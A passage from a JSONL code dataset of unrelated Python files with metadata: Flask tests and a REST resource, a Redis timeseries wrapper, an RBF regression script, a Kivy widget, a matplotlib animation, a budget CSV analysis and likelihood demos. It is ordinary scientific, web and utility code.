np.linspace(4.95, 6.05, 23)][ARG2]\n\nsystem = System(\n alpha = 1e7,\n res = 64,\n observers = True,\n temperatureField = initial,\n innerMethod = 'lu',\n courant = 1.,\n **inputs\n )\n\nsystem[:final:100]()\n","sub_path":"production/plasticfreq.py","file_name":"plasticfreq.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"570504597","text":"from flask import *\n\n\nimport unittest\nimport sys\nimport json\nsys.path.insert(0, '../')\n\nfrom app import *\n\n\nclass TestApp(unittest.TestCase):\n def setUp(self):\n TESTING = True\n WTF_CSRF_ENABLED = False\n\n SQLALCHEMY_DATABASE_URI = 'sqlite:///:memory:' \n self.app = app.test_client()\n \n\n self.headers = {'Content-type': 'application/json'}\n self.json_data = { \"from\": \"test@test.com\",\n \"from_name\": \"test\",\n \"to\": \"test@test.com\",\n \"to_name\": \"test\",\n \"subject\": \"test\",\n \"body\": \"test\"}\n \n \n\n def test_email(self):\n response = self.app.post('/email', data = json.dumps(self.json_data))\n \n self.assertTrue(response.status_code == 415, msg=None)\n \n response = self.app.post('/email', data = json.dumps({}), headers=self.headers)\n self.assertTrue(response.status_code == 500, msg=None)\n \n response = self.app.post('/email', data = json.dumps(self.json_data), headers=self.headers)\n self.assertTrue(response.status_code == 200, msg=None)\n\n def test_email_post_query(self):\n response = self.app.get('/query_email_post?from_name=test')\n self.assertTrue(response.status_code == 200, msg=None)\n\n\nif __name__ == '__main__':\n unittest.main()\n\n","sub_path":"tests/test_app.py","file_name":"test_app.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"354103007","text":"import logging\n\nimport redis\nfrom kairos import Timeseries\n\n__all__ = ['RedisTimeSeries']\n\n\nclass RedisTimeSeries:\n\n def __init__(self, **kwargs):\n self.client = None\n try:\n self.client = redis.StrictRedis(host=kwargs['host'], port=kwargs['port'], db=kwargs['db'])\n self.client.ping()\n logging.debug('Redis host=%s,port=%s,db=%d- Connected!', kwargs['host'], kwargs['port'], kwargs['db'])\n except Exception as ex:\n self.client = None\n logging.error(\"Redis host=%s,port=%s,db=%d- Error %s\", ex, kwargs['host'], kwargs['port'], kwargs['db'])\n pass\n\n self.ts = None\n if self.client is not None:\n logging.debug('Timeseries - Create')\n if 'timeseries' in kwargs:\n self.ts = Timeseries(self.client, type='gauge', intervals=kwargs['timeseries'])\n else:\n self.ts = Timeseries(self.client, type='gauge', intervals={\n 'seconds': {\n 'step': 5, # 5 seconds\n 'steps': 120, # last 10 minutes\n 'read_cast': float,\n }\n }\n )\n\n def record_hit(self, key, measurement):\n if self.client:\n self.ts.insert(str(key), float(measurement))\n\n def record_response_time(self, content_id, measurement):\n self.record_hit(str(content_id) + ':rt', float(measurement))\n\n def record_status(self, content_id, measurement):\n self.record_hit(str(content_id) + ':status', float(measurement))\n\n def get_timeseries(self, key):\n if self.client is not None:\n # logging.info(\"properties: %s\", str(self.ts.properties(str(content_id) + ':' + str(monitor_id))) )\n return self.ts.series(str(key), 'seconds')\n\n return None\n\n def get_response_time_timeseries(self, content_id):\n # logging.info(\"properties: %s\", str(self.ts.properties(str(content_id) + ':' + str(monitor_id))) )\n return self.get_timeseries(str(content_id) + ':rt')\n\n def get_status_timeseries(self, content_id):\n # logging.info(\"properties: %s\", str(self.ts.properties(str(content_id) + ':' + str(monitor_id))) )\n return self.get_timeseries(str(content_id) + ':status')\n\n def get_timeseries_avg(self, key):\n # logging.info(\"properties: %s\", str(self.ts.properties(str(content_id) + ':' + str(monitor_id))) )\n series = []\n avg = 0.0\n if self.client is not None:\n series = self.ts.series(str(key), 'seconds')\n\n summ = 0.0\n count = 0.0\n for key, value in series.items():\n if value:\n summ += float(value)\n count += 1.0\n\n if count > 0.0:\n avg = summ / count\n\n logging.debug('serie avg: %f', avg)\n return avg\n\n def get_response_time_avg(self, content_id):\n return self.get_timeseries_avg(str(content_id) + ':rt')\n","sub_path":"src/powergslb/database/redis/timeseries.py","file_name":"timeseries.py","file_ext":"py","file_size_in_byte":3042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"543438619","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Apr 24 17:33:48 2018\r\n\r\n@author: Henk\r\n\"\"\"\r\n\r\nimport scipy as np\r\nimport scipy.linalg as la\r\nimport pickle\r\nfrom rbf_data import netRBF\r\n#from simnet import simnet\r\n#from simnet_old import simnet\r\n#from plot_struct import plot_struct\r\n\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib as mpl\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\n#from matplotlib.colors import LightSource\r\n\r\n#np.set_printoptions(precision=2)\r\n\r\nplt.close('all')\r\nbbox_props = dict(boxstyle=\"square,pad=0.9\", alpha=1, fc=\"w\", ec=\"k\", lw=2)\r\n\r\n#np.random.seed(0)\r\n#random_state = np.random.get_state()\r\n#np.random.set_state(random_state)\r\n\r\n# =============================================================================\r\n# Load data from state estimation\r\n# =============================================================================\r\n\r\nwith open('data.pickle', 'rb') as file:\r\n state_estimation = pickle.load(file)\r\n\r\nX = state_estimation['z_pred']\r\nY = state_estimation['c_m']\r\nT = state_estimation['T']\r\n\r\nmod_list = state_estimation['mod_list']\r\nmod_data = state_estimation['mod_data']\r\nmod_time = state_estimation['mod_time']\r\nmod_out = state_estimation['mod_out']\r\n\r\nval_data = state_estimation['val_data']\r\nval_time = state_estimation['val_time']\r\n\r\n\r\nm = np.size(X,0) # number of states\r\nN = np.size(X,1) # number of measurements\r\nmeas_list = range(N) # list of measurement indices\r\n\r\nx1 = mod_data[0]\r\nx2 = mod_data[1]\r\n\r\nbias = netRBF.biases\r\nbiases = np.ones((1,len(x1)))\r\nXeval = np.row_stack((x1, x2, biases)) if bias else np.row_stack((x1, x2))\r\n\r\n\r\n#netRBF.NhidL = 1\r\nif netRBF.NhidL == 1:\r\n if not netRBF.distr:\r\n center_x = np.linspace(min(x1), max(x1), 4)\r\n center_y = np.linspace(min(x2), max(x2), 4)\r\n centersx, centersy = np.meshgrid(center_x, center_y)\r\n size_centers = np.size(centersx)\r\n centersx = np.reshape(centersx, (np.size(centersx)))\r\n centersy = np.reshape(centersy, (np.size(centersy)))\r\n \r\n netRBF.centers = np.zeros((3, size_centers)) if bias else np.zeros((2, size_centers))\r\n\r\n netRBF.Nhid = size_centers\r\n netRBF.NhidB = (size_centers+1) if bias else size_centers\r\n \r\n netRBF.centers[0] = centersx\r\n netRBF.centers[1] = centersy\r\n if bias:\r\n netRBF.centers[2] = np.ones((size_centers)) \r\n\r\n elif netRBF.distr == 'smart':\r\n netRBF.centers[0] = centersx\r\n netRBF.centers[1] = centersy\r\n\r\nelse:\r\n print(\"This layer amount is not implemented. Please choose between {}.\".format(\"1 and 2\"))\r\n\r\n#plt.show(plt.scatter(centersx, centersy)) # plot of the locations of the RBFs\r\n# =============================================================================\r\n# Try X times, then rerun with the best result, and show that\r\n# =============================================================================\r\n\r\nnetRBF.IW = np.ones((netRBF.NinB, netRBF.NhidB))\r\nnetRBF.OW = np.ones((netRBF.NhidB, netRBF.Nout))\r\n\r\nA = np.zeros((len(mod_out),size_centers))\r\n\r\n#i = number of measurements\r\n#j = number of neurons\r\n#k = number of input dimensions\r\n\r\nfor j in range(size_centers):\r\n for i in range(len(mod_out)):\r\n x_i = mod_data[0:2,[i]]\r\n nu_ij = la.norm((netRBF.IW[:,[j]])**2 * (x_i - netRBF.centers[:,[j]])**2)\r\n A[i,j] = np.exp(-nu_ij)\r\n\r\nnetRBF.OW = np.linalg.inv(A.T.dot(A)).dot(A.T).dot(mod_out)\r\n\r\nOutput = A.dot(netRBF.OW)\r\n\r\nprint(\"RMS: {:6f}\".format(np.sqrt(np.sum((Output - mod_out)**2)/len(mod_out))))\r\n\r\n#==============================================================================\r\n# Plotting\r\n#==============================================================================\r\n\r\ndo_plot = 1\r\nanimate = 0 #enable this to get a rotating animation\r\n\r\nif do_plot:\r\n TRI = mpl.tri.Triangulation(Xeval[0], Xeval[1])\r\n mask = mpl.tri.TriAnalyzer(TRI).get_flat_tri_mask(0.01)\r\n \r\n fig = plt.figure()\r\n ax = fig.add_subplot(111, projection='3d')\r\n ax.view_init(90,0)\r\n# ax.set_proj_type('ortho')\r\n ax.plot_trisurf(Xeval[0], Xeval[1], Output, mask=mask, cmap=mpl.cm.jet, linewidth=0.2)\r\n# ax.scatter(X[0], X[1], Y, c='k', marker='.', linewidths=0.1)\r\n# ax.scatter(centersx, centersy, -0.06, c='k') # plots the RBF centers\r\n ax.set_xlabel(r'$\\alpha$')\r\n ax.set_ylabel(r'$\\beta$')\r\n ax.set_zlabel(r'$C_m$')\r\n\r\n if animate:\r\n for angle in range(0, 360):\r\n ax.view_init(30, angle)\r\n plt.draw()\r\n plt.pause(.001)\r\n else:\r\n plt.show()\r\n","sub_path":"lin_regr.py","file_name":"lin_regr.py","file_ext":"py","file_size_in_byte":4528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"642170462","text":"from app import db, models\nfrom flask_restful import Resource, Api, reqparse, abort\n\n# 参数初始化\nparse = reqparse.RequestParser()\nparse.add_argument('name')\nparse.add_argument('introduce')\nparse.add_argument('picture')\n\n\nclass extend(Resource):\n # 查询其他需要信息\n def get(self, id):\n\n # 判断是否要查询其他需要列表\n if (id == 0):\n l = []\n extends = models.extend.query.all()\n # 判断其他需要列表是否为空\n if extends:\n for item in extends:\n l.append({\n \"id\": item.id,\n \"name\": item.name,\n \"introduce\": item.introduce,\n \"picture\": item.picture\n })\n d = {}\n d[\"list\"] = l\n return d, 200\n else:\n return {\n abort(404, message=\"{} doesn't exist\".format(id))\n }\n\n extend = models.extend.query.get(id)\n # 判断其他需要是否存在\n if extend:\n return {\n \"id\": extend.id,\n \"name\": extend.name,\n \"introduce\": extend.introduce,\n \"picture\": extend.picture,\n }, 200\n else:\n return {\n abort(404, message=\"{} doesn't exist\".format(id))\n }\n\n # 添加其他需要信息\n def post(self, id):\n # # 判断其他需要是否存在\n # if models.extend.query.get(id):\n # abort(400, message=\"{} existed\".format(id))\n\n # 找到之前最大的id\n max = models.extend.query.order_by(db.desc(models.extend.id)).first()\n id = max.id + 1 if max else 1\n # 创建其他需要\n extend = models.extend()\n extend.id = id\n args = parse.parse_args()\n # 将传入参数加入到extend中\n extend.name = args.name\n extend.introduce = args.introduce\n extend.picture = args.picture\n # 将extend存入数据库\n try:\n db.session.add(extend)\n db.session.commit()\n return {\"message\": True}\n except Exception as e:\n db.session.rollback()\n abort(500)\n\n # 修改其他需要\n def put(self, id):\n extend = models.extend.query.get(id)\n args = parse.parse_args()\n # 判断其他需要是否存在\n if extend:\n extend.name = args.name if args.name else extend.name\n extend.introduce = args.introduce if args.introduce else extend.introduce\n extend.picture = args.picture if args.picture else extend.picture\n db.session.commit()\n return {\"message\": True}\n else:\n return {\n abort(404, message=\"{} doesn't exist\".format(id))\n }\n\n # 删除其他需要\n def delete(self, id):\n extend = models.extend.query.get(id)\n # 判断其他需要是否存在\n if extend:\n try:\n db.session.delete(extend)\n db.session.commit()\n return {\"message\": True}\n except Exception as e:\n db.session.rollback()\n abort(500)\n else:\n return {\n abort(404, message=\"{} doesn't exist\".format(id))\n }","sub_path":"server/app/json/extend.py","file_name":"extend.py","file_ext":"py","file_size_in_byte":3438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"325380586","text":"from kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.uix.label import Label\nfrom kivy.uix.spinner import Spinner\nfrom kivy.uix.tabbedpanel import TabbedPanel, TabbedPanelHeader\nfrom kivy.uix.button import Button\n\nfrom pyaudio import PyAudio\n\n\nclass AfInputDevice(GridLayout):\n def __init__(self, **kwargs):\n self.rows = 1\n self.cols = 1\n GridLayout.__init__(self, **kwargs)\n self.topLayout=BoxLayout(orientation = \"vertical\")\n self.add_widget(self.topLayout)\n self.topLayout.add_widget(Label(text='tjosan'))\n\nclass AfInputManager(GridLayout):\n def __init__(self, **kwargs):\n self.rows = 2\n self.cols = 1\n GridLayout.__init__(self, **kwargs)\n\n self.mainPanel = TabbedPanel()\n self.mainPanel.default_tab_content = AfInputDevice()\n print(\"WIDTH\", self.width)\n self.mainPanel.default_tab_text = \"Default Input\"\n self.add_widget(self.mainPanel)\n self.add_widget(Button(text=\"Add new\"))\n\n\n\nclass AfWidget(GridLayout):\n def __init__(self, **kwargs):\n self.p = PyAudio()\n self.rows = 1\n self.cols = 1\n GridLayout.__init__(self, **kwargs)\n\n self.mainPanel = TabbedPanel()\n print(\"WIDTH\", self.width)\n self.mainPanel.default_tab_text = \"AF Output Devices\"\n\n self.add_widget(self.mainPanel)\n self.inputPanel = TabbedPanelHeader(text=\"AF Input Devices\")\n self.inputPanel.content = AfInputManager()\n self.mainPanel.add_widget(self.inputPanel)\n self.mainPanel.tab_width = 200\n #topLayout = BoxLayout(orientation = \"vertical\")\n \n #topLayout.add_widget(Label(text=\"Input device\", ))\n #self.inputDevs = Spinner(text = \"Select input\")\n #topLayout.add_widget(self.inputDevs)\n \n #topLayout.add_widget(Label(text=\"Output device\", ))\n #self.outputDevs = Spinner(text = \"Select output\")\n #topLayout.add_widget(self.outputDevs)\n \n #self.updateSoundDevices()\n #self.add_widget(topLayout)\n\n def updateSoundDevices(self):\n api_cnt = self.p.get_host_api_count()\n dev_cnt = self.p.get_device_count()\n inputs = []\n outputs = []\n print(\"Number of API's\", api_cnt, \"Number of sound devices\", dev_cnt)\n for i in range(dev_cnt):\n d = self.p.get_device_info_by_index(i)\n if d['maxInputChannels'] > 0:\n inputs.append(d['name'])\n if d['maxOutputChannels'] > 0:\n outputs.append(d['name'])\n\n print(\"inputs\", inputs)\n print(\"outputs\", outputs)\n self.inputDevs.values = inputs\n self.outputDevs.values = outputs\n\n\n","sub_path":"src/py3/af_widget.py","file_name":"af_widget.py","file_ext":"py","file_size_in_byte":2731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"12039214","text":"import pandas as pd\nfrom process_utils import iou, writer, return_annotate_dict\nimport ipdb\n\nlabeled_dat = pd.read_csv('labeled_nuro.txt', sep='\\t')\ngt_dat = pd.read_csv('nuro_gt.txt', sep='\\t')\n\nannotation_path = 'updated_train_nuro.txt'\nuuid_path = 'updated_uuid_nuro.txt'\n\nmerged_dat = pd.merge(labeled_dat, gt_dat, on=['uuid','frame_no', 'camera_no'])\n\nipdb.set_trace()\n# merged_dat = gt_dat.merge(labeled_dat)\n\nmerged_dat['iou'] = merged_dat.apply(lambda row: iou((row['xmin_gt'], row['ymin_gt'], row['xmax_gt'], row['ymax_gt']), \n (row['x_min'], row['y_min'], row['x_max'], row['y_max'])), axis=1)\n\nprint('Computed IOU!')\nmerged_dat.to_csv('merged_dat.txt', sep='\\t')\n\n# merged_dat = pd.read_csv('merged_dat.txt', sep='\\t')\n\niou_gt_paths = list(set(merged_dat[merged_dat['iou'] > 0.75]['image_path']))\n\niou_lt_paths = list(set(merged_dat[merged_dat['iou'] <= 0.75]['image_path']))\n\nwriter('iou_gt_paths', iou_gt_paths)\nwriter('iou_lt_paths', iou_lt_paths)\n\nannotate_list = open(annotation_path).readlines()\nuuid_list = open(uuid_path).readlines() \n\nannotate_dict = return_annotate_dict(annotation_path)\nprint('Returned dict')\ngood_label_train = open('good_label_train_nuro.txt', 'w')\ngood_label_uuid = open('good_label_uuid_nuro.txt', 'w') \nbad_label_train = open('bad_label_train_nuro.txt', 'w')\nbad_label_uuid = open('bad_label_uuid_nuro.txt', 'w')\n\n# total_label_train = open('total_label_train_nuro.txt', 'w') \n# total_label_uuid = open('total_label_uuid_nuro.txt', 'w') \n\nfor path in iou_gt_paths:\n idx = annotate_dict[path]\n annotation = annotate_list[idx]\n uuid = uuid_list[idx]\n good_label_train.write(annotation)\n good_label_uuid.write(uuid)\n\nfor path in iou_lt_paths:\n idx = annotate_dict[path]\n annotation = annotate_list[idx]\n uuid = uuid_list[idx]\n bad_label_train.write(annotation)\n bad_label_uuid.write(uuid)\n\ngood_label_train.close()\ngood_label_uuid.close()\nbad_label_train.close()\nbad_label_uuid.close()\n","sub_path":"merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"455537684","text":"from msa_sdk.variables import Variables\nfrom msa_sdk.msa_api import MSA_API\nfrom datetime import datetime\nimport json\nimport requests\n\ndev_var = Variables()\ncontext = Variables.task_call()\n\ndateTimeObj = datetime.now()\nformat = \"%Y-%m-%dT%H:%M:%S+0000\"\ntime1 = dateTimeObj.strftime(format)\nformat = \"%Y-%m-%d\"\ndate = dateTimeObj.strftime(format)\n\nurl = \"http://msa_es:9200/ubilogs-\"+date+\"/_doc\"\n\nce_list = context['ce_list']\ner_list = context['er_list']\n \nfor i in range(len(ce_list)):\n payload = {\"rawlog\": \" VPN \"+context['vpn_id']+\" configured between \"+ce_list[i]['id']+\" and \"+er_list[i]['id']+\"\", \"device_id\": \"\"+ce_list[i]['id']+\"\", \"date\": \"\"+time1+\"\", \"customer_ref\": \"TyrellCorp\", \"severity\": \"5\", \"type\": \"NOTIFICATION\", \"subtype\": \"VPN WF\"}\n headers = {'content-type': 'application/json'}\n r = requests.post(url, json=payload, headers=headers)\n\nif context['warning'] == 1:\n ret = MSA_API.process_content('WARNING', f'VPN {context[\"vpn_id\"]} Rollback completed, Error on some devices', context, True)\n print(ret)\nelse:\n ret = MSA_API.process_content('ENDED', f'VPN {context[\"vpn_id\"]} Rollback completed', context, True)\n print(ret)","sub_path":"VPN_Activation/Rollback_Notify.py","file_name":"Rollback_Notify.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"469464025","text":"#from django.utils import simplejson\nimport json as simplejson\nfrom media.models import *\nfrom django.forms.models import model_to_dict\nfrom citizen.models import Citizen\nfrom property.models import Property\nfrom asset.models import Business\n\nclass MediaMapper: \n \n\t\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n\tGet Media by Associated Type\n\t\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\" \n\t@staticmethod\n\tdef getMedia(type,obj):\n\t\tkwargs = {}\n\t\tkwargs[type + '__exact'] = obj\n\t\tkwargs['i_status__exact'] = 'active'\n\t\tmediaList = Media.objects.filter(**kwargs).order_by(\"-date_created\")\n\t\tresult = []\n\t\tif mediaList:\n\t\t\tfor i in mediaList:\n\t\t\t\ttemp = model_to_dict(i)\n\t\t\t\tif i.tags:\n\t\t\t\t\ttemp['tags'] = temp['tags'].replace(\"|\",\" | \")\n\t\t\t\ttemp['associations'] = MediaMapper.getMediaAssociations(i)\n\t\t\t\ttemp['date'] = i.date_created\n\n\t\t\t\tresult.append(temp)\n\t\treturn result\n\n\t\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n\tGet Media by tags\n\t\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\" \n\t@staticmethod\n\tdef getMediaByTags(tags):\n\t\tkwargs = {}\n\t\tif tags:\n\t\t\tfor tag in tags:\n\t\t\t\tkwargs['tags__icontains'] = tag\n\t\t\t\tkwargs['i_status__exact'] = 'active'\n\n\t\tmedia = Media.objects.filter(**kwargs)\n\t\treturn media\n\n\t@staticmethod\n\tdef getMediaAssociations(media):\n\t\tlinks = \"\"\n\t\tif media.citizen != None:\n\t\t\tcitizen = media.citizen\n\t\t\tlinks += \"C: \" + '' + citizen.getDisplayName() + \" (CID: \" + citizen.citizen_id + \")
    \"\n\t\tif media.business != None:\n\t\t\tbusiness = media.business\n\t\t\tlinks += \"B: \" + '' + business.name + \" (TIN: \" + business.tin + \")
    \"\n\t\tif media.property != None:\n\t\t\tproperty = media.property\n\t\t\tlinks += \"P: \" + '' + property.getDisplayName() + \" (UPI: \" + property.getUPI() + \")
    \"\n\t\tif media.billboard != None:\n\t\t\tbillboard = media.billboard\n\t\t\tlinks += \"Billboard: \" + '' + billboard.name + \" (UPI: \" + billboard.property.getUPI() + \")
    \"\n\n\t\treturn links\n","sub_path":"media/mappers/MediaMapper.py","file_name":"MediaMapper.py","file_ext":"py","file_size_in_byte":2353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"32074389","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Dec 18 20:01:16 2017\n\n@author: Administrator\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom matplotlib import animation\n#import matplotlib\n#matplotlib.rcParams['animation.convert_path'] = 'D:\\\\software\\\\ImageMagick-7.0.7-Q16\\\\convert.exe'\nfig,ax = plt.subplots()\n\nx = np.arange(0,2*np.pi,0.01)\nline, = ax.plot(x,np.sin(np.pi * x))\n\nax.set_ylim((-2,2))\n#ax = plt.axes(xlim=(0,7),ylim=(-2,2))\n#label = ax.text([],[],'')\n\ny = np.sin(np.pi * x)\nyy = []\n\nfor i in range(100):\n k = 2*i+1\n fk = 2 / ( k * np.pi)\n yy.append(fk * np.sin(k * np.pi * x))\n\ndef f1(i):\n line.set_ydata(np.sin(np.pi * x+i/10))\n return line,\n\n\ndef init_fun():\n \n line.set_ydata(y)\n return line,\n\n\ndef update(i):\n# global label,ax\n \n plt.text(3,1.5,r'$K=%d$'%(i+1),\n fontdict={'size': 16, 'color': 'r'})\n# ax.text(3,1.5,'K=%d'%(i+1))\n# label.set_text('k=%d'%(i+1))\n# label.set_position(['3','1.5'])\n line.set_ydata(sum(yy[0:i]) )\n# ax.text(3,1.5,' ')\n return line,\n \nani = animation.FuncAnimation(fig=fig,func = update ,frames=10, #其中一种,其他的自行搜索\n init_func=init_fun,interval=200,repeat=True,blit=True) \n\n\nani.save('ani.gif',writer='imagemagick',fps=2)\n\nplt.show()\n#import numpy as np\n#import matplotlib.pyplot as plt\n#from matplotlib.animation import FuncAnimation\n#\n## Fixing random state for reproducibility\n#np.random.seed(19680801)\n#\n#\n## Create new Figure and an Axes which fills it.\n#fig = plt.figure(figsize=(7, 7))\n#ax = fig.add_axes([0, 0, 1, 1], frameon=False)\n#ax.set_xlim(0, 1), ax.set_xticks([])\n#ax.set_ylim(0, 1), ax.set_yticks([])\n#\n## Create rain data\n#n_drops = 50\n#rain_drops = np.zeros(n_drops, dtype=[('position', float, 2),\n# ('size', float, 1),\n# ('growth', float, 1),\n# ('color', float, 4)])\n#\n## Initialize the raindrops in random positions and with\n## random growth rates.\n#rain_drops['position'] = np.random.uniform(0, 1, (n_drops, 2))\n#rain_drops['growth'] = np.random.uniform(50, 200, n_drops)\n#\n## Construct the scatter which we will update during animation\n## as the raindrops develop.\n#scat = ax.scatter(rain_drops['position'][:, 0], rain_drops['position'][:, 1],\n# s=rain_drops['size'], lw=0.5, edgecolors=rain_drops['color'],\n# facecolors='none')\n#\n#\n#def update(frame_number):\n# # Get an index which we can use to re-spawn the oldest raindrop.\n# current_index = frame_number % n_drops\n#\n# # Make all colors more transparent as time progresses.\n# rain_drops['color'][:, 3] -= 1.0/len(rain_drops)\n# rain_drops['color'][:, 3] = np.clip(rain_drops['color'][:, 3], 0, 1)\n#\n# # Make all circles bigger.\n# rain_drops['size'] += rain_drops['growth']\n#\n# # Pick a new position for oldest rain drop, resetting its size,\n# # color and growth factor.\n# rain_drops['position'][current_index] = np.random.uniform(0, 1, 2)\n# rain_drops['size'][current_index] = 5\n# rain_drops['color'][current_index] = (0, 0, 0, 1)\n# rain_drops['growth'][current_index] = np.random.uniform(50, 200)\n#\n# # Update the scatter collection, with the new colors, sizes and positions.\n# scat.set_edgecolors(rain_drops['color'])\n# scat.set_sizes(rain_drops['size'])\n# scat.set_offsets(rain_drops['position'])\n#\n#\n## Construct the animation, using the update function as the animation\n## director.\n#animation = FuncAnimation(fig, update, interval=10)\n#plt.show()\n","sub_path":"python_basic/matplotlib/新建文件夹/Animation.py","file_name":"Animation.py","file_ext":"py","file_size_in_byte":3567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"258862574","text":"import pathlib\r\nimport csv\r\n\r\n# Point to the data file\r\ncsvpath = pathlib.Path(\"Resources/budget_data.csv\")\r\n\r\n# Create some empty lists to store the title, date, and profit/loss\r\ndate = []\r\nPl = []\r\n\r\nwith open(file=csvpath, mode='r') as csvfile:\r\n# CSV reader specifies delimiter and variable that holds contents\r\n csvreader = csv.reader(csvfile, delimiter=',')\r\n\r\n# Read the header row first to skip it, since we don't want to include it in our column lists\r\n csv_header = next(csvreader)\r\n\r\n# Add each row after the header to the date and Pl lists we created above\r\n for row in csvreader:\r\n date.append(row[0])\r\n Pl.append(float(row[1]))\r\n\r\n # Take first difference of the Profit list \r\n Difference = [Pl[i + 1] - Pl[i] for i in range(len(Pl)-1)]\r\n\r\n # Perform calculations on the lists we created\r\n Total = round(sum(Pl))\r\n DateLength = len(date)\r\n Average_Change = round(sum(Difference)/len(Difference),2)\r\n Max_Difference = round(max(Difference)) \r\n Max_Index = Difference.index(Max_Difference) \r\n Max_IndexDate = date[Max_Index+1]\r\n Min_Difference = round(min(Difference))\r\n Min_Index = Difference.index(Min_Difference) \r\n Min_IndexDate = date[Min_Index+1]\r\n\r\n# Print our results to the terminal\r\nprint(f\"Financial Analysis\")\r\nprint(\"-----------------\")\r\nprint(f\"Total months: {DateLength}\")\r\nprint(f\"Total: ${Total}\")\r\nprint(f\"Average Change: ${Average_Change}\")\r\nprint(f\"Greatest Increase in Profits: {Max_IndexDate} (${Max_Difference})\")\r\nprint(f\"Greatest Decrease in Profits: {Min_IndexDate} (${Min_Difference})\")\r\n\r\n# Specify the file to write to\r\noutput_path = pathlib.Path(\"analysis/Pybank_output.csv\")\r\n\r\n# Open the file using \"write\" mode. Specify the variable to hold the contents\r\nwith open(file=output_path, mode='w') as csvfile:\r\n\r\n # Initialize csv.writer\r\n csvwriter = csv.writer(csvfile, delimiter=',')\r\n\r\n # Write the first row (column headers)\r\n csvwriter.writerow(['Total months', 'Total', 'Average Change', 'Greatest_Increase in Profits_Date', 'Greatest Increase in Profits', 'Greatest Decrease in Profits Date', 'Greatest Decrease in Profts'])\r\n \r\n # Fill in the data rows\r\n csvwriter.writerow([DateLength,Total,Average_Change,Max_IndexDate,Max_Difference,Min_IndexDate,Min_Difference])\r\n \r\n\r\n","sub_path":"Main_PyBank.py","file_name":"Main_PyBank.py","file_ext":"py","file_size_in_byte":2307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"379167694","text":"import numpy as np\nimport scipy.stats as stats\nimport scipy.special as special\nfrom matplotlib import pyplot as plt\nimport seaborn as sns\nsns.set_style('whitegrid')\nsns.set_context('talk')\nfrom pprint import pprint\nimport pandas as pd\npd.set_option('precision', 3)\n\ndef bernoulli(y, theta):\n return theta**y * (1 - theta)**(1 - y)\n\ndef likelihood(y, theta, axis=None):\n return np.prod(bernoulli(y, theta), axis=axis)\n\ndef log_bernoulli(y, theta):\n return y * np.log10(theta + 1e-10) + (1 - y) * np.log10(1 - theta + 1e-10)\n\ndef log_likelihood(y, theta, axis=None):\n return np.sum(log_bernoulli(y, theta), axis=axis)\n\ndef coin_flip(bias=0.5, num_flips=100):\n flips = (np.random.rand(num_flips) >= 1-bias).astype(int)\n\n return flips\n\ndef point_2():\n probabilities = []\n for y in range(2):\n for theta in [0.25, 0.5]:\n probabilities.append([y, theta, bernoulli(y, theta)])\n probabilities = pd.DataFrame(probabilities, columns=['outcome', 'theta', 'probability'])\n print(probabilities)\n\n sns.barplot(x='theta', y='probability', hue='outcome',\n data=probabilities)\n sns.despine()\n return probabilities\n\ndef point_3():\n theta = np.linspace(0, 1, 101)\n\n plt.plot(theta, bernoulli(1, theta), label='γ = 1')\n plt.plot(theta, bernoulli(0, theta), label='γ = 0')\n plt.legend()\n plt.xlabel('θ')\n plt.ylabel('Likelihood')\n\ndef point_4():\n probabilities = []\n log_probabilities = []\n bias = 0.5\n for num_flips in np.logspace(1,5,5).astype(int):\n y = coin_flip(bias, num_flips)\n theta = np.ones(y.shape)*bias\n probabilities.append([num_flips, likelihood(y, theta), log_likelihood(y, theta), 10**log_likelihood(y, theta)])\n probabilities = pd.DataFrame(probabilities, columns=['flips', 'likelihood', 'log_likelihood', 'exp_log_likehood'])\n print('Why the log-likelhood matters')\n print(probabilities)\n\n dataset = [[1], [1, 1], [1, 1, 0, 1]]\n theta = np.linspace(0, 1, 101)\n likelihoods = pd.DataFrame(columns=['theta', 